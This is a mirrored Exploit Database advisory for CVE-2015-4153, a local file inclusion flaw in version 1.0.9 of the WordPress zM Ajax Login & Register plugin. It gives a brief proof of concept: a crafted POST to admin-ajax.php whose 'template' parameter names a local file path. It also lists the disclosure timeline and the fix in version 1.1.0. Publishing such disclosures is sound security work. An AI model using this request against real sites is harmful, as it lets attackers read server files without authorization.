WordPress Plugin zM Ajax Login & Register 1.0.9 – Local File Inclusion

• Exploit Database
• 180 阅读

• 作者： Panagiotis Vagenas
  日期： 2015-06-04
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/37200/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38

  # Exploit Title: CVE-2015-4153 - WordPress zM Ajax Login & Register Plugin [Local File Inclusion] # Date: 2015/06/01 # Exploit Author: Panagiotis Vagenas # Contact: https://twitter.com/panVagenas # Vendor Homepage: http://zanematthew.com/ # Software Link: https://downloads.wordpress.org/plugin/zm-ajax-login-register.1.0.9.zip # Version: 1.0.9 # Tested on: WordPress 4.2.2 # Category: webapps # CVE: CVE-2015-4153   * Description   Any authenticated or non-authenticated user can perform a local file inclusion attack by exploiting the wp_ajax_nopriv_load_template action. Plugin simply includes the file specified in &apos;template&apos; POST parameter without any further validation.   * Proof of Concept   Send a post request to http://my.vulnerable.website.com/wp-admin/admin-ajax.php</code> with data: action=load_template&template=[relative path to local file]&security=[wp nonce]&referer=[action from which the nonce came from] * Timeline   2015/06/01 Discovered 2015/06/01 Vendor alerted via contact form at his website 2015/06/03 Vendor responded 2015/06/03 Fixed in version 1.1.0     * Solution   Update to version 1.1.0